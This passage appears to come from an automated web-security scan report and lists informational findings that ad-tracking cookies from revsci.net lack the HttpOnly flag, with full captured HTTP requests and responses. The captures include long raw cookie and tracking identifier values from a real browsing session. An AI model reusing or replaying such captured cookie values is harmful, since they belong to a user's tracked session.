Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_ZS_a=MLsv7iUucA5nphC0fK8UWVoPI7fHKbGZaCQWuLR8p51z2DQ30G6uId0c9nDR2NMmzuXDJn0g0ESydFY6J95tmRiMY4yJ+sPdsYG8naLdrtr9SkW1eU9LpSjwtwgkQP0c7xx5jIRX7BMLqY4BgQCi3lhOAqvHai05Eb4PMDzu8yVD7ZZtiMBMCGycqLqWQYCGq6/md6/qYfaCA/ASs+y+9h5Xku/5nx7gfwirUhl4NHT2YUt+eLF1KH0Dtob5tEs06Q4obofo5w6/Tq+72ff/TaSCEZMZN8I5s1OOFuAASezBAhhSmCgFlyoZVVoDwXYDXkzHvff3+yl07BzRzA1eRi19Z+xwYoBSMP57irOrEQXluDeg+WH4CuHVXdpJP4HgrkGvCJrCPigIHu5GI7hwiNibi41/41/tnH36B3S/V+jJFysVDPJjnlu9tMtcj3eUM1FGM6b+OUkIZ7c78jeLogk07LTWGnScH2nMsO4=; rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDK8mbNy+QEHgUYHSBgXF1Q2gqkracs3b0+sttkvcnG4FQF1YFME4zlfRD4DXpoJTg2w/OOAXJfulf50F2dnbJ6c24OjD7TvtquFKgBZCKKyjppRZHFHcbfosrS35Xr6UaqRDJHhec0uOoN4qBjvRD7oDG89WuT/jDSRmfUKDalir3lvwuSM3Eno9UyMRLjDMJdTTZdVXvE46xEeKd+xqoVz43eYieFLzO9ksyAFN1KP1MAdnb7OHyEWmDqqeyD4JJFuhF+d/W6NEf/eIy/pVBeJG48foazTEPvZmv6aaIVHPs

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_ZS_a=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637UACbRNpW80lkUA+HR+nmRzzOL28cRLrw7OdqtvRQX7M6YvuD6G01f/A+phz9GIcLk0FNfgXkx4D8v6War7+H+n9IY3rvMelQqlIvMHasq7diCRdHMsDP/apIhcFBpMun4I8++b0pgSX68nwxclAHeOABjla6/AOc2BQgDFU6b9vZkaJ68Hzv2LCrFVwbqW955VGiQa9ZwRJRQW1c/gp2cK7vRFdAePNMLM3+P6V3gVrJMrxfC4CtNT6GPmD4jam0mCUtb2pjN1+jC+69ca7GvnJmqOWlv0ccmvPKnMeXng==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:36:09 GMT; Path=/
Set-Cookie: rtc_WzYR=MLsv8SUucA5nprAD264UWVoPI7fHKbGZaCQWuLR8p51z2DQ30G6uId0c9nDR2NMmzuXDJn0g0OQE4KL99Qp8zilVvFLegxD/FKzZzKAFPPXNSkm1eU9Lpin0xxgsRv18t9kElLVE051AluTuDnRDieHkOf9TCWukp+fyOVqRG+FbypZ1lOmeCoTp4pvl4W2xqmQFAWY4P5lr/3fAt0as+z/3c58a0YrmF2CFroRB+arCLp2/A/hlSL3YhoR/5MNsKutYjoQwhJscXN5vRZ/qEN/s+mTleYT1e0XRQJw7SG6Pb2foVCrRD5zlxI6M9xB55wUh10H6ft0R/IG6wmIogiyFxbz9L/rVYw1C4gDlVZ0sYCbRWJ8laUnjTGKqfAWyeIdxhd2ou3ym15NGUzxTHSbE3gGfUiwP1c7Rn8JWxY041sNP9IpNYh6qgR92imO/5zl3mFWhFNjp7cfhWA2MYorGw1uHV11zKR6Oij8mYbuD; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:36:09 GMT; Path=/
X-Proc-ms: 22
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:36:09 GMT
Content-Length: 593

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424','D08734_72076'
...[SNIP]...
6.145. http://pix04.revsci.net/E05511/b3/0/3/0902121/914837697.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/914837697.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/914837697.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252F%253Faffname%253DWCAX%2526adtag%253DHomepage%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18196%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc2dfb1&0&&4d9d35c9&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc2dfbd&0&&4d9d2f40&00f8712b16a2747053422af6cef97d9a; rtc_33wk=MLuBO6+ht4kWQAcYCwq3qvGtUKGrBZ8doDP9+JcCeOOzqVD+we0MdrEy1Q9wVOPnx3+D9JMtHr3sXfzNw3d1fHSsgQ0j1PMA3u0A65h1Zdx44dhHS5+AaIPoFOSkJCsUdawtp/+wPz4ovCW6/jlMSWl5gugGYoVzCFcXDgXPFV44jOFQ9OvWXmsv0TUYz+5nkUCtLLzUzXTh7M+zWyh9Os1EVo5VMh5rHTjjZnK71873pcHYYzezCHZTM/2+0SL4Kjk8dPShfwkCSnJWFkNsK0MzXgFnrllh6u548CifcAFwE1rm2D91a3IypBzg; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc2dfda&0&&4d9c03eb&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paNmEREzM5uAjEsBEbZba7uQQIHoALYGisPLsFHhBzkvhsvoTAE9Wvh6ZCxNEguR8S2rPkq36I/Y42ALDUOFLsElUcIPk9fKtZgFPAifF96YUyd0oLw0n0Ryt05wdrN868QJ/+5QhhVDeoAuh30DL1Nhh9Cj6Z6bFYRSzXtL17j6Azv6OJ7vZk+tBc1rGGFfHZ8KvQqVAuPohuFqyL9DCTu4N0Gi+vRwD/rSPuL1I9buZQs2FTpssoPA2lbNTF5HywZMTMvEJzT0Zf2UCkxkv4eFl2m+vJ05v7cxXSZCytfEePc3AVcKePos/B6yGLnOnYNZSbct435ntIpmH+aMoQIO1EEBT/KbMs4hz185mDkHl9ZhQ39ljvZDokrGoTU36gJfTJZI/AqWc0s0Xmbv+pE9pw7ldj41i8wbXyTCypJvRY2Q6QpW/VxvJxSNMtuSsgJLL78oDV0r4PR7nI83zsUuOS3RTLGmoD3dqyR4OH4CVdFAjOC5c1c5gtOr1VVOjgkORQRxylxYzirxZwMyP6/DKD8ngoLSc1GRKtnJzMc/bI0l4AEBF/cQi4iDXo+iRxGlBQS15VZXhxq88Nq17eHWw9sEvQd1KJzj3TkOH5xiza3lfPjV8/CHorrK/+Knobbr3hxTR+CDzj6HH90GGT11M9it+1+QA5nWCEArmpXBdmF6CsdzcoC8OR+A2ZnIOw21PFvMOjPJ0Xl4ibJjWNuZLTuB1pifXet2MrhoPp1+fInzsdxtGeHmDvcCDU5EzIBOGhIw1ek72Dd+mmWJa7p78Egukc2SG4u/GfEFrBJvicafxIMcv0rhZ8jG4whpHITo1dongFFkobD4S8XLrx2FfETkMJiYku6qW2LdkVjWOWQhvIn8h6J78k9hHbKJ/8ZAg0J7tKUKeAUHjqFcYAEZH0H9DcwWmXwEcnQEbhb9TCWm/0ppaG1RDf1n+fu24/+jM7KvN/z7/7q0u56jH+YrYa3a+P1ge47W+os0pZiaDQpJH0htz1ZJ9klEG2dBtkl1cI3R0VAnabjV6XDJT9jTTZOg12FcQncz8373PU7Ej0JkBaKIJAHku50JX6LtJ/FgCiFkaBBhVLHZvlusvhSNrYDJHBvuC8L8qGa82X1lUTBV7rlrFEvpcBgBGilPpJasi; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; rsi_segs_1000000=pUPNOUOl7wMQVo3BeRs7jC2QUfqNmZ2gYuIADaDQt5G0OSvqZp+ukKFjTv3oN27/yGm8+cN3Kz+epgl9TMpcdZEJG7zn2zEGFOmzupBquqGoXybH0TX8GMUM6DtSO+88cxB/fMQ42H2XbCk6vCmvZgxWriPKYDBzQtIhVLb4FWC2F/o19JXw51AzOQ85qtmk2CcAQWzyh5w3YtYp2bysXMTwtAY4id34udr0ugZ7jpUlRTH3CVtTEu18sZo=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_33wk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOUOFKAIUV7mdodOedAQb3oMEVFUwQvflEHBbS0BEV+W2DdLCvt5j0vEjmwU6sZuBk2yeXWUDCC0RAc67aEfjs+D6+e23oOVqgagtOoGY11InYdvurs7m7ctN3jo8p82IYgsx46p3H3YQvOHvwQPDGXR/Ved4X4k/unRGu8RIKK47fIdqZFbeUIDClowwWWmi9lM6PDViH8X3SrL+3XikNBxpEwGud74EEuUNjzR3IOcCw+4RMu3Uo0EgrdFr4Ma9kA==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:31:36 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Sat, 07-May-2011 12:31:36 GMT; Path=/
Set-Cookie: udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:31:36 GMT; Path=/
Set-Cookie: rtc_qGsx=MLsvrFUucT5jJQFEjn4UCLtfKi1bT6XJF/Ke3QlsQpoZ1X9kRiPoMT0vPHni220BuefN4+w0QDxcRXN24I0Asr7xgdACqrHB0m67F9qXTgct2EN+vx1Kz2qgrSXHJMcW31u9PbAu1Q0puOakzdXHZVUaqKXKpvaRcVcKiXSTA7DL6lqA31DNueTJfahrhz8tvgH9JKtB0RUqAk7TLicfK1WfGaaOsREpwP9lBTpjNapbBi9c69Suxn4OypmFarcp5fNRqAbKRPRF8eHRNT4vvWr+PoZv2GyTjicCIP3umhIkB+xOAXxZrvclHRkbDsIsnwSNEAybZ0fF2IDRSpjtr3pDJ+ihxQDXHAbdwm6LbyN6IoNJ003+6/nA; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:31:36 GMT; Path=/
X-Proc-ms: 24
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:31:36 GMT
Content-Length: 293

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10004','D08734_70006','D08734_72076','D08734_72077','D08734_72082'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvail
...[SNIP]...
6.146. http://pix04.revsci.net/E05511/b3/0/3/0902121/918432446.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/918432446.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/918432446.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D14408230%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D465801%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408230
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_YHkz=MLsv8SUucA5nprADwxMUT9S30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbNNARLmM/MYdyRgTqxD/lMxcrQFepPr9SkW1eU9LpSn2xzgwRP18/xx5kJplxqdZg0K0i0fqu/J/OZ9TCWtEp+fzuXuRG+FbCpZ1lOmeCoTp4pvl426xqmAFAWY4P51r/3fAwOzCWO5FcV4p1IrmF2CVroSvndkRCrxSEgB3YRuQwSAQiH132nljo3cuPvcqTkJH7pqq+HZ+yu4LbbP1Wws8UaQ//AvRqu0LQKkkR7aSBTL/fY/adAXHS4sVvNFsz2sFWsy5E+9lTHca29T2ckra1UWkj/ZVjlkwAfbv1rIjcWXvGBjkFTLYIeSAmiAAOsEhNg/HOoGcoZuIH37rGNoaFz8F4rx7j8fqSWaE+E5rI3yMJpNn0B20F8yoQz7E4kPhGO4G5iCUfwVoCLJLxkKPdlyOZqGapSs=; rsi_segs_1000000=pUPFJ0OBbwIMV594t637EICbRK61AlFcyDKEJCWvRS7OL28cRLpo4rpo7XVNzj9gP1CiHgVo5mSsLobwXfhabTWqws1LtFVOOmtg+DZPGqPoDRbjefGo4DSBh5W5mCATwNqLrrq2mE2GjQMBwMuv4EPDDBam1uOkR40BDnTL/sDBt9WuC5bXzUW/ndpHqipDlH7OsFGV35g2HWka6+yarGWSFmohtSsOzftqnJhxH9yncihZ1EZuA0c3fXK11GeN0/nGmU96bdPVmqpplUJ0XEbM6A+xav/MLMHCb2Q6szUn1s3x2QJpsvJOIM5S9is=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_YHkz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBKHIMVp94t/QnbUw36xTQY7LDbTABFXxvXNWqLifxp5y+URSIooUUZKyvzimWvstALXhlEmWx+zWRJ7JnGfOpf0Ud/9xHuDtILCncfzqXUSnG/Cy3tsi7pMKrY9q7DERCZ0T3/lunM2xMQBSBJVEUN1eGGkclWu3zVqYKu5lIFd5ScUAJfDtN2TRJpWBZilVKmbMngJiNBfaWDNpEIlfZPSGQQvDPOlnJ+nGH99lb2Bk3H20qgR4dL5WAyViP4j156jYt9UDiCWHOq3FM/wRcoCReVqgVLsKJewTJtW8TfeREavDRJyXsDARApw==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:59:28 GMT; Path=/
Set-Cookie: rtc_ntuX=MLsv7iUucA5nprADwxMU7dS30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBepPrdSk21eU9Lpyn2tzgwRP0c/xxljHTX7BOLqY4BgQC03lRGEmvvtSk5ED4IMDjv8yVDLIK7pDAruXGuNrqWcYC2y8NTEmqwp1W1r3QCTBMPKlKt8h8jhogkQYAEg5VB8arCKp0tKwd34RoQt9pfCo91MbMw2aFSr6asrqy72fdH+/zLkZMRMy3ciFEOFuAAUeQuwVGfb3k3GVzU53rLUI0DvmM+6V5MRX1CqiXP3mwBN1MQ8mPvGr+qM8YE4h9IgMnmrTH8vdwVzzmKxdAFML67Dft3ETWNo373nILFCOSd1vgwNYXcTuHTqYEl4k5deAJ/QaLuaTNFARLE0GJGZm144sbAffZWpSi/OK979TxuQBnYIYB1WHNnx7GJBucarx4=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:59:28 GMT; Path=/
X-Proc-ms: 25
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:59:27 GMT
Content-Length: 653

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
